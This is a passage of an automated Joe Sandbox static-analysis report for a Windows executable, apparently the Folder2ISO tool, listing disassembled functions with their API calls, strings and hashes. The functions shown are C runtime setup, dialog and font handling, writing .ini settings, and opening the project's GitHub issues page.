                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006333B1
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006333C4
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006333D7
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006333EA
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006333FD
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00633410
                  • __mtinitlocks.LIBCMT ref: 006339CA
                  • __mtterm.LIBCMT ref: 006339D3
                    • Part of subcall function 00633A3B: DeleteCriticalSection.KERNEL32(?,?,?,?,006339D8,0062F4FE,0064C5D8,00000010), ref: 0063AAFA
                    • Part of subcall function 00633A3B: DeleteCriticalSection.KERNEL32(0064F9B8,?,?,006339D8,0062F4FE,0064C5D8,00000010), ref: 0063AB23
                  • GetCurrentThreadId.KERNEL32 ref: 00633A21
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AddressProc$CriticalDeleteSection$CurrentHandleModuleThread__init_pointers__mtinitlocks__mtterm
                  • String ID:
                  • API String ID: 2077300055-0
                  • Opcode ID: e3cd121dbaa8a634b42c532f5f4a9d46e5d8c551054692e363438efe57afbcfe
                  • Instruction ID: 2065bbbe0081f45afabeb850f9844521611997c0eec17324d34c44172577a07f
                  • Opcode Fuzzy Hash: e3cd121dbaa8a634b42c532f5f4a9d46e5d8c551054692e363438efe57afbcfe
                  • Instruction Fuzzy Hash: EAF067322493726DE7A4B774BC1768A2A978F02730F21461EF091957E1FA628A8241D8
                  Function 00626E68 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 234COMMON
                  Download Yara Rule
                  APIs
                  • _memset.LIBCMT ref: 00626E91
                    • Part of subcall function 0062807D: _sprintf.LIBCMT ref: 00628129
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset_sprintf
                  • String ID: "$CD001$none
                  • API String ID: 1557529856-3346326981
                  • Opcode ID: 193631fdbc5b98fe2cd7b43c5e69c4eaa3e7a04ad8119a35dcc0c52c0042e812
                  • Instruction ID: b68803fb4448c84240330b06cdb9cf65f928331afef1bee5db22f04aef6fdc0d
                  • Opcode Fuzzy Hash: 193631fdbc5b98fe2cd7b43c5e69c4eaa3e7a04ad8119a35dcc0c52c0042e812
                  • Instruction Fuzzy Hash: B9816A75605648AFDB91EF24DC82FEA3BAAEF49300F04047DFD488F287DA7195088B65
                  Function 0063734F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __write$__getptd_noexit__lseeki64
                  • String ID: s+b
                  • API String ID: 1670646965-2084237830
                  • Opcode ID: 2946b2750613e8078b719fc1218b7a414e34c93fecc4924195cff4ebade99551
                  • Instruction ID: 6e1a3d88a9ebaa914ccde8f5e82ecbfee4e5f54a87bad7a09c76b34ef2ca405f
                  • Opcode Fuzzy Hash: 2946b2750613e8078b719fc1218b7a414e34c93fecc4924195cff4ebade99551
                  • Instruction Fuzzy Hash: 1841F3B2108B058BD3389E68C891A767BD7DF85334F148A1DE4B6877D2E774A8019BE1
                  Function 0063FD26 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __tolower_l$___ascii_strnicmp
                  • String ID: s+b
                  • API String ID: 1039138858-2084237830
                  • Opcode ID: 9cc37737b00798d4d895fb2e47299d26ba330b1cd20761385952386f396e99c7
                  • Instruction ID: 56abc6e1291e8a040ddc3f13198e99bc35bb561322364ba935d797a90a33e3e7
                  • Opcode Fuzzy Hash: 9cc37737b00798d4d895fb2e47299d26ba330b1cd20761385952386f396e99c7
                  • Instruction Fuzzy Hash: D1112932C083A55FC720AF64C888ABB77DAEF40355F040A7CF4644B296EB209D09CBD2
                  Function 00621E09 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • WritePrivateProfileStringW.KERNEL32(General,OutputDir,00000000,C:\Users\user\Desktop\6RVmzn1DzL.ini), ref: 00621E86
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: PrivateProfileStringWrite
                  • String ID: C:\Users\user\Desktop\6RVmzn1DzL.ini$General$OutputDir
                  • API String ID: 390214022-2386769019
                  • Opcode ID: f7f1bbbb11ebee27fa40954b8ed45eb0de7cf3e3173aa02bf6acf2e7d85cb1e0
                  • Instruction ID: b665e3aa6b2754de07057ad48191db843868ca8666f5bc7ea7e7dedbb20a4f0b
                  • Opcode Fuzzy Hash: f7f1bbbb11ebee27fa40954b8ed45eb0de7cf3e3173aa02bf6acf2e7d85cb1e0
                  • Instruction Fuzzy Hash: C50168349003199ACB209F64EC06AE573B6EF02700F1141DAE9048F192EB705D84CF56
                  Function 00622E47 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,https://github.com/imgdrive/Folder2ISO/issues,000000FF,?,00000104,00000000), ref: 00622E6E
                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00622E85
                  Strings
                  • https://github.com/imgdrive/Folder2ISO/issues, xrefs: 00622E6B
                  • open, xrefs: 00622E7F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ByteCharExecuteMultiShellWide
                  • String ID: https://github.com/imgdrive/Folder2ISO/issues$open
                  • API String ID: 2498257828-3328090493
                  • Opcode ID: 5ac4be6d6be76816444027932c56c3068cdab05e02acb4cefd029fc2430ac32a
                  • Instruction ID: e8f563bd0026ce88072997cdc031fdcf96df89d6b2774e507baeb5688dce315d
                  • Opcode Fuzzy Hash: 5ac4be6d6be76816444027932c56c3068cdab05e02acb4cefd029fc2430ac32a
                  • Instruction Fuzzy Hash: B3F0E5B550222CBBE720DB619C0DDEF7BADEF06720F510255F925D61C1EA306A04CBE5
                  Function 00621240 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                  Download Yara Rule
                  APIs
                  • wsprintfW.USER32 ref: 00621260
                  • WritePrivateProfileStringW.KERNEL32(General,?,?,C:\Users\user\Desktop\6RVmzn1DzL.ini), ref: 00621278
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: PrivateProfileStringWritewsprintf
                  • String ID: C:\Users\user\Desktop\6RVmzn1DzL.ini$General
                  • API String ID: 1995626314-2908971957
                  • Opcode ID: 41e4994a67c1bfe14b812070325aa5e9a6dc831b2a3dd5a711bc2b74b48027e7
                  • Instruction ID: f198dc5b1a6895aed9603567c48e6788f8d83268bcd42510ef0ef39e473ae926
                  • Opcode Fuzzy Hash: 41e4994a67c1bfe14b812070325aa5e9a6dc831b2a3dd5a711bc2b74b48027e7
                  • Instruction Fuzzy Hash: 69F0A7B5A4020DAB8F00EFA4AD05C9E77AAEF05711B405425FD01D7250D671AA15C7A1
                  Function 0063CC0B Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID:
                  • API String ID: 2102423945-0
                  • Opcode ID: fcedea1ba1fac22df869343fdc51b1586a97789a7b08e1adce8f18b9ec33e549
                  • Instruction ID: 1d8783a901e2b1ba475f01342cdc8242066eb38dde36794bf6653cbe4ce0338f
                  • Opcode Fuzzy Hash: fcedea1ba1fac22df869343fdc51b1586a97789a7b08e1adce8f18b9ec33e549
                  • Instruction Fuzzy Hash: 4431F2325043419BC720AF54D844BAB7AAAEF91774F14192CF85967391DB71C802CBE6
                  Function 00625B9A Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                  Download Yara Rule
                  APIs
                  • PathCanonicalizeW.SHLWAPI(?,?,75A88FB0,75A85420,00000000,?), ref: 00625BCD
                  • _memset.LIBCMT ref: 00625C19
                  • _strncpy.LIBCMT ref: 00625C8C
                  • _strncpy.LIBCMT ref: 00625C9F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _strncpy$CanonicalizePath_memset
                  • String ID:
                  • API String ID: 2595827489-0
                  • Opcode ID: d273ed9c975cf96cfaf04237f2999c7329dba3fb9579c0e070732983394831a1
                  • Instruction ID: b6e1c5470e71dc43b61cf61bcef513083bb492ef5576ac15e1d5bc8878b4f183
                  • Opcode Fuzzy Hash: d273ed9c975cf96cfaf04237f2999c7329dba3fb9579c0e070732983394831a1
                  • Instruction Fuzzy Hash: CF31F135604B119BC334EF68E885BA7B3F6FF88700F10491DE54A87291FB35A509CB96
                  Function 0062AC19 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _strncmp
                  • String ID:
                  • API String ID: 909875538-0
                  • Opcode ID: e13d7f3a35593d2a9a626da55e83e707ec93248fedb2749311de833817991b8d
                  • Instruction ID: e710d4974a7f84eaf0858d5ef15e3062a0b866ac34df3df6813aae907e93c406
                  • Opcode Fuzzy Hash: e13d7f3a35593d2a9a626da55e83e707ec93248fedb2749311de833817991b8d
                  • Instruction Fuzzy Hash: 723149B2D049322FF76212A07C55B7BE61A5F21B46F0C4629FF0858747F1848D945AE7
                  Function 0062F4C2 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063325B: GetStartupInfoW.KERNEL32(?), ref: 00633265
                    • Part of subcall function 00633A58: GetProcessHeap.KERNEL32(0062F4ED,0064C5D8,00000010), ref: 00633A58
                  • __RTC_Initialize.LIBCMT ref: 0062F50A
                  • GetCommandLineA.KERNEL32(0064C5D8,00000010), ref: 0062F524
                  • __setargv.LIBCMT ref: 0062F539
                    • Part of subcall function 0062F5AE: __FF_MSGBANNER.LIBCMT ref: 0062F5B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CommandHeapInfoInitializeLineProcessStartup__setargv
                  • String ID:
                  • API String ID: 3115846406-0
                  • Opcode ID: f123788d20bb69f94479bff32fa77201cbfc55029f66cc814d55b2043a3a8f81
                  • Instruction ID: 149664eaa973c9f881c932e8f5620316f1ee4d33cff94dea8a71ba3e3d517af7
                  • Opcode Fuzzy Hash: f123788d20bb69f94479bff32fa77201cbfc55029f66cc814d55b2043a3a8f81
                  • Instruction Fuzzy Hash: C911E6716407226AFBD07FB1A913B2E23E79F10315F10083DF500AA2D3DEA4D6405AED
                  Function 00622145 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItemTextW.USER32(?,0000000D,?,00000104), ref: 0062216B
                  • SHGetFolderPathW.SHELL32(00000000,00008005,00000000,00000000,?,?,00000104), ref: 00622193
                  • CoInitialize.OLE32(00000000), ref: 0062219A
                  • CoUninitialize.OLE32(?,?,00000104), ref: 006221C4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: FolderInitializeItemPathTextUninitialize
                  • String ID:
                  • API String ID: 3907999222-0
                  • Opcode ID: e82d810580d7c494905e3eb5708dc09f6ffb31eb0f6e37153e2a657f9749e73e
                  • Instruction ID: 18c29f878b68c5675b04d53df7053984a0e5797d16e2b7c153a622cb1d76a3cb
                  • Opcode Fuzzy Hash: e82d810580d7c494905e3eb5708dc09f6ffb31eb0f6e37153e2a657f9749e73e
                  • Instruction Fuzzy Hash: AB1106756016356BDB20AB20BC5DEAE777EEF82700F10415EFA0097241DB705B058E65
                  Function 00622DA2 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteObject.GDI32 ref: 00622DCD
                  • EndDialog.USER32(?,00000001), ref: 00622DDF
                  • GetDlgItem.USER32(?,00000032), ref: 00622DFD
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00622E12
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: DeleteDialogItemMessageObjectSend
                  • String ID:
                  • API String ID: 3485863115-0
                  • Opcode ID: 3bfcd8dc59072a857cef5b83ab17b180b3851896790c5f7331eca1174be7f91c
                  • Instruction ID: 1265ab91ce3f7c503cc58591ac5516ce0091e4999894124b46492363338d42a4
                  • Opcode Fuzzy Hash: 3bfcd8dc59072a857cef5b83ab17b180b3851896790c5f7331eca1174be7f91c
                  • Instruction Fuzzy Hash: 5711C230100B27BBDB219F24FD29BAA3763BB11752F568124F8929A1B2C770DD51EE00
                  Function 00634563 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: fcfc25fe4587f735a41d1feb31c7a08ea343b21b50d4b945cc12bdc200a4080c
                  • Instruction ID: 81f3ec70da655fa8669ce9143d324c446365fd042cfc7a8c03c5403be70c0d01
                  • Opcode Fuzzy Hash: fcfc25fe4587f735a41d1feb31c7a08ea343b21b50d4b945cc12bdc200a4080c
                  • Instruction Fuzzy Hash: 8D014C7680014EBBCF125E84CC418EE7F63BB19365F588519FA5858131CB36EAB1AB81
                  Function 00622BF6 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00622C0F
                  • _memset.LIBCMT ref: 00622C21
                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 00622C30
                  • CreateFontIndirectW.GDI32(?), ref: 00622C41
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CreateFontIndirectMessageObjectSend_memset
                  • String ID:
                  • API String ID: 2248381337-0
                  • Opcode ID: 7e0ce38570f4c76b1520a5cf3b93561697c985732ef1395677133e1449994524
                  • Instruction ID: 1450351323a77d6b265441b2bcc4c3a0a0c88589bdbb74b82151ad78f0bb6a5f
                  • Opcode Fuzzy Hash: 7e0ce38570f4c76b1520a5cf3b93561697c985732ef1395677133e1449994524
                  • Instruction Fuzzy Hash: 14F04F7590021CABDB20ABA5EC4DD9F7BBDFB86B01F400569F905AB141EB715904CB91
                  Function 00632C0A Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                  Download Yara Rule
                  APIs
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00632C18
                  • __initp_misc_cfltcvt_tab.LIBCMT ref: 00632C2D
                  • __initterm_e.LIBCMT ref: 00632C3C
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00632C72
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CurrentImageNonwritable$__initp_misc_cfltcvt_tab__initterm_e
                  • String ID:
                  • API String ID: 321396692-0
                  • Opcode ID: 2cd3c06e3e5ab0966589256d00c5e3d602d63798c4781baf93a1aeb4c93d6fcd
                  • Instruction ID: 41aba0a39496e6d9de0e74aae854c97aeab40c0805e7993ffce334ddda17192d
                  • Opcode Fuzzy Hash: 2cd3c06e3e5ab0966589256d00c5e3d602d63798c4781baf93a1aeb4c93d6fcd
                  • Instruction Fuzzy Hash: FBF0BE30284303AAE7A87760AD37B4D26D3AF16B22F71721DF080944D1DFA2C4488A9A
                  Function 006288CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00629B2F: _memmove.LIBCMT ref: 00629B44
                  • std::_Xinvalid_argument.LIBCPMT ref: 006289FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Xinvalid_argument_memmovestd::_
                  • String ID: deque<T> too long$s+b
                  • API String ID: 256744135-3108237626
                  • Opcode ID: 3683cc09b69045f82811e7f76a97c49f464aa9f1ff3dea14fe7d14cb9a5c701d
                  • Instruction ID: ada5e404ca76dfe8ce5a3de8feddb9361c4cd6b44bed06126aad9f0711485208
                  • Opcode Fuzzy Hash: 3683cc09b69045f82811e7f76a97c49f464aa9f1ff3dea14fe7d14cb9a5c701d
                  • Instruction Fuzzy Hash: BA41B171904215AFDB04DF54DC85D6BB7AEEF84318F04896DF8089B242EA35EA05CFB6
                  Function 00639472 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063388B: __getptd_noexit.LIBCMT ref: 0063388C
                  • _CallSETranslator.LIBCMT ref: 006394D7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CallTranslator__getptd_noexit
                  • String ID: MOC$RCC
                  • API String ID: 608174979-2084237596
                  • Opcode ID: 92d8b2a7bdf95cc88ada303eb311302d1d8f766e7575551a8fbeb4e636c13a37
                  • Instruction ID: 31a7fa155062d970a1cc4e88b0f068dff02c708b25a34e7291f8a99579877c11
                  • Opcode Fuzzy Hash: 92d8b2a7bdf95cc88ada303eb311302d1d8f766e7575551a8fbeb4e636c13a37
                  • Instruction Fuzzy Hash: 9431AB72408305AFDB129F44C840A6AB3FAFF88724F58486CF69107212D7B1ED51CFA2
                  Function 00621364 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                  • PathIsRelativeW.SHLWAPI(00000000,?,00000000), ref: 00621427
                  • PathCombineW.SHLWAPI(?,?,00000000), ref: 00621438
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
